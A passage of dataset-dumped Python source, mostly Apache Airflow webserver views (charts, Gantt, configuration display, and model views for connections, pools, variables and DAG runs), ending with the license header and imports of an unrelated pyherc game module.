tis]) if tries else None\n\n session.commit()\n\n form = DateTimeWithNumRunsForm(data={'base_date': max_date,\n 'num_runs': num_runs})\n\n chart.buildcontent()\n\n return self.render_template(\n 'airflow/chart.html',\n dag=dag,\n demo_mode=conf.getboolean('webserver', 'demo_mode'),\n root=root,\n form=form,\n chart=chart.htmlcontent,\n tab_title='Tries',\n )\n\n @expose('/landing_times')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def landing_times(self, session=None):\n default_dag_run = conf.getint('webserver', 'default_dag_run_display_number')\n dag_id = request.args.get('dag_id')\n dag = dagbag.get_dag(dag_id)\n base_date = request.args.get('base_date')\n num_runs = request.args.get('num_runs')\n num_runs = int(num_runs) if num_runs else default_dag_run\n\n if base_date:\n base_date = timezone.parse(base_date)\n else:\n base_date = dag.get_latest_execution_date() or timezone.utcnow()\n\n dates = dag.date_range(base_date, num=-abs(num_runs))\n min_date = dates[0] if dates else timezone.utc_epoch()\n\n root = request.args.get('root')\n if root:\n dag = dag.sub_dag(\n task_regex=root,\n include_upstream=True,\n include_downstream=False)\n\n chart_height = wwwutils.get_chart_height(dag)\n chart = nvd3.lineChart(\n name=\"lineChart\", x_is_date=True, height=chart_height, width=\"1200\")\n y = {}\n x = {}\n for task in dag.tasks:\n task_id = task.task_id\n y[task_id] = []\n x[task_id] = []\n for ti in task.get_task_instances(start_date=min_date, end_date=base_date):\n ts = ti.execution_date\n if dag.schedule_interval and dag.following_schedule(ts):\n ts = dag.following_schedule(ts)\n if ti.end_date:\n dttm = wwwutils.epoch(ti.execution_date)\n secs = (ti.end_date - ts).total_seconds()\n x[task_id].append(dttm)\n y[task_id].append(secs)\n\n # determine the most relevant time unit for the set of landing times\n # for the DAG\n y_unit = infer_time_unit([d for t in y.values() for d in t])\n # update the y Axis to have the correct time units\n chart.create_y_axis('yAxis', format='.02f', custom_format=False,\n label='Landing Time ({})'.format(y_unit))\n chart.axislist['yAxis']['axisLabelDistance'] = '-15'\n for task in dag.tasks:\n if x[task.task_id]:\n chart.add_serie(name=task.task_id, x=x[task.task_id],\n y=scale_time_units(y[task.task_id], y_unit))\n\n tis = dag.get_task_instances(start_date=min_date, end_date=base_date)\n dates = sorted(list({ti.execution_date for ti in tis}))\n max_date = max([ti.execution_date for ti in tis]) if dates else None\n\n session.commit()\n\n form = DateTimeWithNumRunsForm(data={'base_date': max_date,\n 'num_runs': num_runs})\n chart.buildcontent()\n return self.render_template(\n 'airflow/chart.html',\n dag=dag,\n chart=chart.htmlcontent,\n height=str(chart_height + 100) + \"px\",\n demo_mode=conf.getboolean('webserver', 'demo_mode'),\n root=root,\n form=form,\n tab_title='Landing times',\n )\n\n @expose('/paused', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def paused(self):\n dag_id = request.args.get('dag_id')\n is_paused = True if request.args.get('is_paused') == 'false' else False\n models.DagModel.get_dagmodel(dag_id).set_is_paused(\n is_paused=is_paused)\n return \"OK\"\n\n @expose('/refresh', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n @provide_session\n def refresh(self, session=None):\n DagModel = models.DagModel\n dag_id = request.values.get('dag_id')\n orm_dag = session.query(\n DagModel).filter(DagModel.dag_id == dag_id).first()\n\n if orm_dag:\n orm_dag.last_expired = timezone.utcnow()\n session.merge(orm_dag)\n session.commit()\n\n dag = dagbag.get_dag(dag_id)\n # sync dag permission\n appbuilder.sm.sync_perm_for_dag(dag_id, dag.access_control)\n\n flash(\"DAG [{}] is now fresh as a daisy\".format(dag_id))\n return redirect(request.referrer)\n\n @expose('/gantt')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def gantt(self, session=None):\n dag_id = request.args.get('dag_id')\n dag = dagbag.get_dag(dag_id)\n demo_mode = conf.getboolean('webserver', 'demo_mode')\n\n root = request.args.get('root')\n if root:\n dag = dag.sub_dag(\n task_regex=root,\n include_upstream=True,\n include_downstream=False)\n\n dt_nr_dr_data = get_date_time_num_runs_dag_runs_form_data(request, session, dag)\n dttm = dt_nr_dr_data['dttm']\n\n form = DateTimeWithNumRunsWithDagRunsForm(data=dt_nr_dr_data)\n form.execution_date.choices = dt_nr_dr_data['dr_choices']\n\n tis = [\n ti for ti in dag.get_task_instances(dttm, dttm)\n if ti.start_date and ti.state]\n tis = sorted(tis, key=lambda ti: ti.start_date)\n TF = TaskFail\n ti_fails = list(itertools.chain(*[(\n session\n .query(TF)\n .filter(TF.dag_id == ti.dag_id,\n TF.task_id == ti.task_id,\n TF.execution_date == ti.execution_date)\n .all()\n ) for ti in tis]))\n\n # determine bars to show in the gantt chart\n gantt_bar_items = []\n\n tasks = []\n for ti in tis:\n end_date = ti.end_date or timezone.utcnow()\n # prev_attempted_tries will reflect the currently running try_number\n # or the try_number of the last complete run\n # https://issues.apache.org/jira/browse/AIRFLOW-2143\n try_count = ti.prev_attempted_tries\n gantt_bar_items.append((ti.task_id, ti.start_date, end_date, ti.state, try_count))\n d = alchemy_to_dict(ti)\n d['extraLinks'] = dag.get_task(ti.task_id).extra_links\n tasks.append(d)\n\n tf_count = 0\n try_count = 1\n prev_task_id = \"\"\n for tf in ti_fails:\n end_date = tf.end_date or timezone.utcnow()\n start_date = tf.start_date or end_date\n if tf_count != 0 and tf.task_id == prev_task_id:\n try_count = try_count + 1\n else:\n try_count = 1\n prev_task_id = tf.task_id\n gantt_bar_items.append((tf.task_id, start_date, end_date, State.FAILED, try_count))\n tf_count = tf_count + 1\n task = dag.get_task(tf.task_id)\n d = alchemy_to_dict(tf)\n d['state'] = State.FAILED\n d['operator'] = task.task_type\n d['try_number'] = try_count\n d['extraLinks'] = task.extra_links\n tasks.append(d)\n\n data = {\n 'taskNames': [ti.task_id for ti in tis],\n 'tasks': tasks,\n 'height': len(tis) * 25 + 25,\n }\n\n session.commit()\n\n return self.render_template(\n 'airflow/gantt.html',\n dag=dag,\n execution_date=dttm.isoformat(),\n form=form,\n data=data,\n base_date='',\n demo_mode=demo_mode,\n root=root,\n )\n\n @expose('/extra_links')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n def extra_links(self):\n \"\"\"\n A restful endpoint that returns external links for a given Operator\n\n It queries the operator that sent the request for the links it wishes\n to provide for a given external link name.\n\n API: GET\n Args: dag_id: The id of the dag containing the task in question\n task_id: The id of the task in question\n execution_date: The date of execution of the task\n link_name: The name of the link reference to find the actual URL for\n\n Returns:\n 200: {url: , error: None} - returned when there was no problem\n finding the URL\n 404: {url: None, error: } - returned when the operator does\n not return a URL\n \"\"\"\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n execution_date = request.args.get('execution_date')\n link_name = request.args.get('link_name')\n dttm = timezone.parse(execution_date)\n dag = dagbag.get_dag(dag_id)\n\n if not dag or task_id not in dag.task_ids:\n response = jsonify(\n {'url': None,\n 'error': \"can't find dag {dag} or task_id {task_id}\".format(\n dag=dag,\n task_id=task_id\n )}\n )\n response.status_code = 404\n return response\n\n task = dag.get_task(task_id)\n\n try:\n url = task.get_extra_links(dttm, link_name)\n except ValueError as err:\n response = jsonify({'url': None, 'error': str(err)})\n response.status_code = 404\n return response\n if url:\n response = jsonify({'error': None, 'url': url})\n response.status_code = 200\n return response\n else:\n response = jsonify(\n {'url': None, 'error': 'No URL found for {dest}'.format(dest=link_name)})\n response.status_code = 404\n return response\n\n @expose('/object/task_instances')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n def task_instances(self):\n dag_id = request.args.get('dag_id')\n dag = dagbag.get_dag(dag_id)\n\n dttm = request.args.get('execution_date')\n if dttm:\n dttm = timezone.parse(dttm)\n else:\n return \"Error: Invalid execution_date\"\n\n task_instances = {\n ti.task_id: alchemy_to_dict(ti)\n for ti in dag.get_task_instances(dttm, dttm)}\n\n return json.dumps(task_instances)\n\n\nclass VersionView(AirflowBaseView):\n default_view = 'version'\n\n @expose('/version')\n @has_access\n def version(self):\n try:\n airflow_version = airflow.__version__\n except Exception as e:\n airflow_version = None\n logging.error(e)\n\n # Get the Git repo and git hash\n git_version = None\n try:\n git_version = str(pkgutil.get_data('airflow', 'git_version'), encoding=\"UTF-8\")\n except Exception as e:\n logging.error(e)\n\n # Render information\n title = \"Version Info\"\n return self.render_template(\n 'airflow/version.html',\n title=title,\n airflow_version=airflow_version,\n git_version=git_version)\n\n\nclass ConfigurationView(AirflowBaseView):\n default_view = 'conf'\n\n @expose('/configuration')\n @has_access\n def conf(self):\n raw = request.args.get('raw') == \"true\"\n title = \"Airflow Configuration\"\n subtitle = AIRFLOW_CONFIG\n # Don't show config when expose_config variable is False in airflow config\n if conf.getboolean(\"webserver\", \"expose_config\"):\n with open(AIRFLOW_CONFIG, 'r') as file:\n config = file.read()\n table = [(section, key, value, source)\n for section, parameters in conf.as_dict(True, True).items()\n for key, (value, source) in parameters.items()]\n else:\n config = (\n \"# Your Airflow administrator chose not to expose the \"\n \"configuration, most likely for security reasons.\")\n table = None\n\n if raw:\n return Response(\n response=config,\n status=200,\n mimetype=\"application/text\")\n else:\n code_html = Markup(highlight(\n config,\n lexers.IniLexer(), # Lexer call\n HtmlFormatter(noclasses=True))\n )\n return self.render_template(\n 'airflow/config.html',\n pre_subtitle=settings.HEADER + \" v\" + airflow.__version__,\n code_html=code_html, title=title, subtitle=subtitle,\n table=table)\n\n\n######################################################################################\n# ModelViews\n######################################################################################\n\nclass DagFilter(BaseFilter):\n def apply(self, query, func): # noqa\n if appbuilder.sm.has_all_dags_access():\n return query\n filter_dag_ids = appbuilder.sm.get_accessible_dag_ids()\n return query.filter(self.model.dag_id.in_(filter_dag_ids))\n\n\nclass AirflowModelView(ModelView):\n list_widget = AirflowModelListWidget\n page_size = PAGE_SIZE\n\n CustomSQLAInterface = wwwutils.CustomSQLAInterface\n\n\nclass SlaMissModelView(AirflowModelView):\n route_base = '/slamiss'\n\n datamodel = AirflowModelView.CustomSQLAInterface(SlaMiss)\n\n base_permissions = ['can_list']\n\n list_columns = ['dag_id', 'task_id', 'execution_date', 'email_sent', 'timestamp']\n add_columns = ['dag_id', 'task_id', 'execution_date', 'email_sent', 'timestamp']\n edit_columns = ['dag_id', 'task_id', 'execution_date', 'email_sent', 'timestamp']\n search_columns = ['dag_id', 'task_id', 'email_sent', 'timestamp', 'execution_date']\n base_order = ('execution_date', 'desc')\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n formatters_columns = {\n 'task_id': wwwutils.task_instance_link,\n 'execution_date': wwwutils.datetime_f('execution_date'),\n 'timestamp': wwwutils.datetime_f('timestamp'),\n 'dag_id': wwwutils.dag_link,\n }\n\n\nclass XComModelView(AirflowModelView):\n route_base = '/xcom'\n\n datamodel = AirflowModelView.CustomSQLAInterface(XCom)\n\n base_permissions = ['can_add', 'can_list', 'can_edit', 'can_delete']\n\n search_columns = ['key', 'value', 'timestamp', 'execution_date', 'task_id', 'dag_id']\n list_columns = ['key', 'value', 'timestamp', 'execution_date', 'task_id', 'dag_id']\n add_columns = ['key', 'value', 'execution_date', 'task_id', 'dag_id']\n edit_columns = ['key', 'value', 'execution_date', 'task_id', 'dag_id']\n base_order = ('execution_date', 'desc')\n\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n formatters_columns = {\n 'task_id': wwwutils.task_instance_link,\n 'execution_date': wwwutils.datetime_f('execution_date'),\n 'timestamp': wwwutils.datetime_f('timestamp'),\n 'dag_id': wwwutils.dag_link,\n }\n\n @action('muldelete', 'Delete', \"Are you sure you want to delete selected records?\",\n single=False)\n def action_muldelete(self, items):\n self.datamodel.delete_all(items)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n def pre_add(self, item):\n item.execution_date = timezone.make_aware(item.execution_date)\n item.value = XCom.serialize_value(item.value)\n\n def pre_update(self, item):\n item.execution_date = timezone.make_aware(item.execution_date)\n item.value = XCom.serialize_value(item.value)\n\n\nclass ConnectionModelView(AirflowModelView):\n route_base = '/connection'\n\n datamodel = AirflowModelView.CustomSQLAInterface(Connection)\n\n base_permissions = ['can_add', 'can_list', 'can_edit', 'can_delete']\n\n extra_fields = ['extra__jdbc__drv_path', 'extra__jdbc__drv_clsname',\n 'extra__google_cloud_platform__project',\n 'extra__google_cloud_platform__key_path',\n 'extra__google_cloud_platform__keyfile_dict',\n 'extra__google_cloud_platform__scope',\n 'extra__google_cloud_platform__num_retries',\n 'extra__grpc__auth_type',\n 'extra__grpc__credential_pem_file',\n 'extra__grpc__scopes',\n 'extra__yandexcloud__service_account_json',\n 'extra__yandexcloud__service_account_json_path',\n 'extra__yandexcloud__oauth',\n 'extra__yandexcloud__public_ssh_key',\n 'extra__yandexcloud__folder_id',\n 'extra__kubernetes__in_cluster',\n 'extra__kubernetes__kube_config',\n 'extra__kubernetes__namespace']\n list_columns = ['conn_id', 'conn_type', 'host', 'port', 'is_encrypted',\n 'is_extra_encrypted']\n add_columns = edit_columns = ['conn_id', 'conn_type', 'host', 'schema',\n 'login', 'password', 'port', 'extra'] + extra_fields\n add_form = edit_form = ConnectionForm\n add_template = 'airflow/conn_create.html'\n edit_template = 'airflow/conn_edit.html'\n\n base_order = ('conn_id', 'asc')\n\n @action('muldelete', 'Delete', 'Are you sure you want to delete selected records?',\n single=False)\n @has_dag_access(can_dag_edit=True)\n def action_muldelete(self, items):\n self.datamodel.delete_all(items)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n def process_form(self, form, is_created):\n formdata = form.data\n if formdata['conn_type'] in ['jdbc', 'google_cloud_platform', 'grpc', 'yandexcloud', 'kubernetes']:\n extra = {\n key: formdata[key]\n for key in self.extra_fields if key in formdata}\n form.extra.data = json.dumps(extra)\n\n def prefill_form(self, form, pk):\n try:\n d = json.loads(form.data.get('extra', '{}'))\n except Exception:\n d = {}\n\n if not hasattr(d, 'get'):\n logging.warning('extra field for {} is not iterable'.format(\n form.data.get('conn_id', '')))\n return\n\n for field in self.extra_fields:\n value = d.get(field, '')\n if value:\n field = getattr(form, field)\n field.data = value\n\n\nclass PoolModelView(AirflowModelView):\n route_base = '/pool'\n\n datamodel = AirflowModelView.CustomSQLAInterface(models.Pool)\n\n base_permissions = ['can_add', 'can_list', 'can_edit', 'can_delete']\n\n list_columns = ['pool', 'slots', 'running_slots', 'queued_slots']\n add_columns = ['pool', 'slots', 'description']\n edit_columns = ['pool', 'slots', 'description']\n\n base_order = ('pool', 'asc')\n\n @action('muldelete', 'Delete', 'Are you sure you want to delete selected records?',\n single=False)\n def action_muldelete(self, items):\n if any(item.pool == models.Pool.DEFAULT_POOL_NAME for item in items):\n flash(\"default_pool cannot be deleted\", 'error')\n self.update_redirect()\n return redirect(self.get_redirect())\n self.datamodel.delete_all(items)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n def pool_link(attr):\n pool_id = attr.get('pool')\n if pool_id is not None:\n url = url_for('TaskInstanceModelView.list', _flt_3_pool=pool_id)\n return Markup(\"{pool_id}\").format(url=url, pool_id=pool_id)\n else:\n return Markup('Invalid')\n\n def frunning_slots(attr):\n pool_id = attr.get('pool')\n running_slots = attr.get('running_slots')\n if pool_id is not None and running_slots is not None:\n url = url_for('TaskInstanceModelView.list', _flt_3_pool=pool_id, _flt_3_state='running')\n return Markup(\"{running_slots}\").format(url=url, running_slots=running_slots)\n else:\n return Markup('Invalid')\n\n def fqueued_slots(attr):\n pool_id = attr.get('pool')\n queued_slots = attr.get('queued_slots')\n if pool_id is not None and queued_slots is not None:\n url = url_for('TaskInstanceModelView.list', _flt_3_pool=pool_id, _flt_3_state='queued')\n return Markup(\"{queued_slots}\").format(url=url, queued_slots=queued_slots)\n else:\n return Markup('Invalid')\n\n formatters_columns = {\n 'pool': pool_link,\n 'running_slots': frunning_slots,\n 'queued_slots': fqueued_slots\n }\n\n validators_columns = {\n 'pool': [validators.DataRequired()],\n 'slots': [validators.NumberRange(min=-1)]\n }\n\n\nclass VariableModelView(AirflowModelView):\n route_base = '/variable'\n\n list_template = 'airflow/variable_list.html'\n edit_template = 'airflow/variable_edit.html'\n\n datamodel = AirflowModelView.CustomSQLAInterface(models.Variable)\n\n base_permissions = ['can_add', 'can_list', 'can_edit', 'can_delete', 'can_varimport']\n\n list_columns = ['key', 'val', 'is_encrypted']\n add_columns = ['key', 'val']\n edit_columns = ['key', 'val']\n search_columns = ['key', 'val']\n\n base_order = ('key', 'asc')\n\n def hidden_field_formatter(attr):\n key = attr.get('key')\n val = attr.get('val')\n if wwwutils.should_hide_value_for_key(key):\n return Markup('*' * 8)\n if val:\n return val\n else:\n return Markup('Invalid')\n\n formatters_columns = {\n 'val': hidden_field_formatter,\n }\n\n validators_columns = {\n 'key': [validators.DataRequired()]\n }\n\n def prefill_form(self, form, id):\n if wwwutils.should_hide_value_for_key(form.key.data):\n form.val.data = '*' * 8\n\n @action('muldelete', 'Delete', 'Are you sure you want to delete selected records?',\n single=False)\n def action_muldelete(self, items):\n self.datamodel.delete_all(items)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n @action('varexport', 'Export', '', single=False)\n def action_varexport(self, items):\n var_dict = {}\n d = json.JSONDecoder()\n for var in items:\n try:\n val = d.decode(var.val)\n except Exception:\n val = var.val\n var_dict[var.key] = val\n\n response = make_response(json.dumps(var_dict, sort_keys=True, indent=4))\n response.headers[\"Content-Disposition\"] = \"attachment; filename=variables.json\"\n response.headers[\"Content-Type\"] = \"application/json; charset=utf-8\"\n return response\n\n @expose('/varimport', methods=[\"POST\"])\n @has_access\n @action_logging\n def varimport(self):\n try:\n out = request.files['file'].read()\n if isinstance(out, bytes):\n d = json.loads(out.decode('utf-8'))\n else:\n d = json.loads(out)\n except Exception:\n self.update_redirect()\n flash(\"Missing file or syntax error.\", 'error')\n return redirect(self.get_redirect())\n else:\n suc_count = fail_count = 0\n for k, v in d.items():\n try:\n models.Variable.set(k, v, serialize_json=not isinstance(v, str))\n except Exception as e:\n logging.info('Variable import failed: {}'.format(repr(e)))\n fail_count += 1\n else:\n suc_count += 1\n flash(\"{} variable(s) successfully updated.\".format(suc_count))\n if fail_count:\n flash(\"{} variable(s) failed to be updated.\".format(fail_count), 'error')\n self.update_redirect()\n return redirect(self.get_redirect())\n\n\nclass JobModelView(AirflowModelView):\n route_base = '/job'\n\n datamodel = AirflowModelView.CustomSQLAInterface(BaseJob)\n\n base_permissions = ['can_list']\n\n list_columns = ['id', 'dag_id', 'state', 'job_type', 'start_date',\n 'end_date', 'latest_heartbeat',\n 'executor_class', 'hostname', 'unixname']\n search_columns = ['id', 'dag_id', 'state', 'job_type', 'start_date',\n 'end_date', 'latest_heartbeat', 'executor_class',\n 'hostname', 'unixname']\n\n base_order = ('start_date', 'desc')\n\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n formatters_columns = {\n 'start_date': wwwutils.datetime_f('start_date'),\n 'end_date': wwwutils.datetime_f('end_date'),\n 'hostname': wwwutils.nobr_f('hostname'),\n 'state': wwwutils.state_f,\n 'latest_heartbeat': wwwutils.datetime_f('latest_heartbeat'),\n }\n\n\nclass DagRunModelView(AirflowModelView):\n route_base = '/dagrun'\n\n datamodel = AirflowModelView.CustomSQLAInterface(models.DagRun)\n\n base_permissions = ['can_list', 'can_add']\n\n add_columns = ['state', 'dag_id', 'execution_date', 'run_id', 'external_trigger', 'conf']\n list_columns = ['state', 'dag_id', 'execution_date', 'run_id', 'external_trigger']\n search_columns = ['state', 'dag_id', 'execution_date', 'run_id', 'external_trigger']\n\n base_order = ('execution_date', 'desc')\n\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n add_form = edit_form = DagRunForm\n\n formatters_columns = {\n 'execution_date': wwwutils.datetime_f('execution_date'),\n 'state': wwwutils.state_f,\n 'start_date': wwwutils.datetime_f('start_date'),\n 'dag_id': wwwutils.dag_link,\n 'run_id': wwwutils.dag_run_link,\n }\n\n @action('muldelete', \"Delete\", \"Are you sure you want to delete selected records?\",\n single=False)\n @has_dag_access(can_dag_edit=True)\n @provide_session\n def action_muldelete(self, items, session=None):\n self.datamodel.delete_all(items)\n self.update_redirect()\n dirty_ids = []\n for item in items:\n dirty_ids.append(item.dag_id)\n return redirect(self.get_redirect())\n\n @action('set_running', \"Set state to 'running'\", '', single=False)\n @provide_session\n def action_set_running(self, drs, session=None):\n try:\n DR = models.DagRun\n count = 0\n dirty_ids = []\n for dr in session.query(DR).filter(\n DR.id.in_([dagrun.id for dagrun in drs])).all():\n dirty_ids.append(dr.dag_id)\n count += 1\n dr.start_date = timezone.utcnow()\n dr.state = State.RUNNING\n session.commit()\n flash(\"{count} dag runs were set to running\".format(count=count))\n except Exception as ex:\n flash(str(ex), 'error')\n flash('Failed to set state', 'error')\n return redirect(self.get_default_url())\n\n @action('set_failed', \"Set state to 'failed'\",\n \"All running task instances would also be marked as failed, are you sure?\",\n single=False)\n @provide_session\n def action_set_failed(self, drs, session=None):\n try:\n DR = models.DagRun\n count = 0\n dirty_ids = []\n altered_tis = []\n for dr in session.query(DR).filter(\n DR.id.in_([dagrun.id for dagrun in drs])).all():\n dirty_ids.append(dr.dag_id)\n count += 1\n altered_tis += \\\n set_dag_run_state_to_failed(dagbag.get_dag(dr.dag_id),\n dr.execution_date,\n commit=True,\n session=session)\n altered_ti_count = len(altered_tis)\n flash(\n \"{count} dag runs and {altered_ti_count} task instances \"\n \"were set to failed\".format(count=count, altered_ti_count=altered_ti_count))\n except Exception:\n flash('Failed to set state', 'error')\n return redirect(self.get_default_url())\n\n @action('set_success', \"Set state to 'success'\",\n \"All task instances would also be marked as success, are you sure?\",\n single=False)\n @provide_session\n def action_set_success(self, drs, session=None):\n try:\n DR = models.DagRun\n count = 0\n dirty_ids = []\n altered_tis = []\n for dr in session.query(DR).filter(\n DR.id.in_([dagrun.id for dagrun in drs])).all():\n dirty_ids.append(dr.dag_id)\n count += 1\n altered_tis += \\\n set_dag_run_state_to_success(dagbag.get_dag(dr.dag_id),\n dr.execution_date,\n commit=True,\n session=session)\n altered_ti_count = len(altered_tis)\n flash(\n \"{count} dag runs and {altered_ti_count} task instances \"\n \"were set to success\".format(count=count, altered_ti_count=altered_ti_count))\n except Exception:\n flash('Failed to set state', 'error')\n return redirect(self.get_default_url())\n\n\nclass LogModelView(AirflowModelView):\n route_base = '/log'\n\n datamodel = AirflowModelView.CustomSQLAInterface(Log)\n\n base_permissions = ['can_list']\n\n list_columns = ['id', 'dttm', 'dag_id', 'task_id', 'event', 'execution_date',\n 'owner', 'extra']\n search_columns = ['dag_id', 'task_id', 'event', 'execution_date', 'owner', 'extra']\n\n base_order = ('dttm', 'desc')\n\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n formatters_columns = {\n 'dttm': wwwutils.datetime_f('dttm'),\n 'execution_date': wwwutils.datetime_f('execution_date'),\n 'dag_id': wwwutils.dag_link,\n }\n\n\nclass TaskInstanceModelView(AirflowModelView):\n route_base = '/taskinstance'\n\n datamodel = AirflowModelView.CustomSQLAInterface(models.TaskInstance)\n\n base_permissions = ['can_list']\n\n page_size = PAGE_SIZE\n\n list_columns = ['state', 'dag_id', 'task_id', 'execution_date', 'operator',\n 'start_date', 'end_date', 'duration', 'job_id', 'hostname',\n 'unixname', 'priority_weight', 'queue', 'queued_dttm', 'try_number',\n 'pool', 'log_url']\n\n order_columns = [item for item in list_columns if item not in ['try_number', 'log_url']]\n\n search_columns = ['state', 'dag_id', 'task_id', 'execution_date', 'hostname',\n 'queue', 'pool', 'operator', 'start_date', 'end_date']\n\n base_order = ('job_id', 'asc')\n\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n def log_url_formatter(attr):\n log_url = attr.get('log_url')\n return Markup(\n ''\n ' '\n '').format(log_url=log_url)\n\n def duration_f(attr):\n end_date = attr.get('end_date')\n duration = attr.get('duration')\n if end_date and duration:\n return timedelta(seconds=duration)\n\n formatters_columns = {\n 'log_url': log_url_formatter,\n 'task_id': wwwutils.task_instance_link,\n 'hostname': wwwutils.nobr_f('hostname'),\n 'state': wwwutils.state_f,\n 'execution_date': wwwutils.datetime_f('execution_date'),\n 'start_date': wwwutils.datetime_f('start_date'),\n 'end_date': wwwutils.datetime_f('end_date'),\n 'queued_dttm': wwwutils.datetime_f('queued_dttm'),\n 'dag_id': wwwutils.dag_link,\n 'duration': duration_f,\n }\n\n @provide_session\n @action('clear', lazy_gettext('Clear'),\n lazy_gettext('Are you sure you want to clear the state of the selected task'\n ' instance(s) and set their dagruns to the running state?'),\n single=False)\n def action_clear(self, tis, session=None):\n try:\n dag_to_tis = {}\n\n for ti in tis:\n dag = dagbag.get_dag(ti.dag_id)\n tis = dag_to_tis.setdefault(dag, [])\n tis.append(ti)\n\n for dag, tis in dag_to_tis.items():\n models.clear_task_instances(tis, session, dag=dag)\n\n session.commit()\n flash(\"{0} task instances have been cleared\".format(len(tis)))\n self.update_redirect()\n return redirect(self.get_redirect())\n\n except Exception:\n flash('Failed to clear task instances', 'error')\n\n @provide_session\n def set_task_instance_state(self, tis, target_state, session=None):\n try:\n count = len(tis)\n for ti in tis:\n ti.set_state(target_state, session)\n session.commit()\n flash(\"{count} task instances were set to '{target_state}'\".format(\n count=count, target_state=target_state))\n except Exception:\n flash('Failed to set state', 'error')\n\n @action('set_running', \"Set state to 'running'\", '', single=False)\n @has_dag_access(can_dag_edit=True)\n def action_set_running(self, tis):\n self.set_task_instance_state(tis, State.RUNNING)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n @action('set_failed', \"Set state to 'failed'\", '', single=False)\n @has_dag_access(can_dag_edit=True)\n def action_set_failed(self, tis):\n self.set_task_instance_state(tis, State.FAILED)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n @action('set_success', \"Set state to 'success'\", '', single=False)\n @has_dag_access(can_dag_edit=True)\n def action_set_success(self, tis):\n self.set_task_instance_state(tis, State.SUCCESS)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n @action('set_retry', \"Set state to 'up_for_retry'\", '', single=False)\n @has_dag_access(can_dag_edit=True)\n def action_set_retry(self, tis):\n self.set_task_instance_state(tis, State.UP_FOR_RETRY)\n self.update_redirect()\n return redirect(self.get_redirect())\n\n\nclass DagModelView(AirflowModelView):\n route_base = '/dagmodel'\n\n datamodel = AirflowModelView.CustomSQLAInterface(models.DagModel)\n\n base_permissions = ['can_list', 'can_show']\n\n list_columns = ['dag_id', 'is_paused', 'last_scheduler_run',\n 'last_expired', 'scheduler_lock', 'fileloc', 'owners']\n\n formatters_columns = {\n 'dag_id': wwwutils.dag_link\n }\n\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n def get_query(self):\n \"\"\"\n Default filters for model\n \"\"\"\n return (\n super().get_query()\n .filter(or_(models.DagModel.is_active,\n models.DagModel.is_paused))\n .filter(~models.DagModel.is_subdag)\n )\n\n def get_count_query(self):\n \"\"\"\n Default filters for model\n \"\"\"\n return (\n super().get_count_query()\n .filter(models.DagModel.is_active)\n .filter(~models.DagModel.is_subdag)\n )\n\n @has_access\n @permission_name(\"list\")\n @provide_session\n @expose('/autocomplete')\n def autocomplete(self, session=None):\n query = unquote(request.args.get('query', ''))\n\n if not query:\n wwwutils.json_response([])\n\n # Provide suggestions of dag_ids and owners\n dag_ids_query = session.query(DagModel.dag_id.label('item')).filter(\n ~DagModel.is_subdag, DagModel.is_active,\n DagModel.dag_id.ilike('%' + query + '%'))\n\n owners_query = session.query(func.distinct(DagModel.owners).label('item')).filter(\n ~DagModel.is_subdag, DagModel.is_active,\n DagModel.owners.ilike('%' + query + '%'))\n\n # Hide DAGs if not showing status: \"all\"\n status = flask_session.get(FILTER_STATUS_COOKIE)\n if status == 'active':\n dag_ids_query = dag_ids_query.filter(~DagModel.is_paused)\n owners_query = owners_query.filter(~DagModel.is_paused)\n elif status == 'paused':\n dag_ids_query = dag_ids_query.filter(DagModel.is_paused)\n owners_query = owners_query.filter(DagModel.is_paused)\n\n filter_dag_ids = appbuilder.sm.get_accessible_dag_ids()\n if 'all_dags' not in filter_dag_ids:\n dag_ids_query = dag_ids_query.filter(DagModel.dag_id.in_(filter_dag_ids))\n owners_query = owners_query.filter(DagModel.dag_id.in_(filter_dag_ids))\n\n payload = [row[0] for row in dag_ids_query.union(owners_query).limit(10).all()]\n\n return wwwutils.json_response(payload)\n"} {"ext": "py", "sha": "1a2ec7c86582405243210f553e885066a4c90da0", "content": "# -*- coding: utf-8 -*-\n\n# Copyright (c) 2010-2017 Tuukka Turto\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\nModule defining classes related to inventory actions\n\"\"\"\nfrom pyherc.data import is_armour, is_weapon, is_boots\nfrom pyherc.aspects import log_debug, log_info\nfrom pyherc.events import new_unequip_event\nfrom pyherc.rules.factory import SubActionFactory\n\n\nclass UnEquipFactory(SubActionFactory):\n 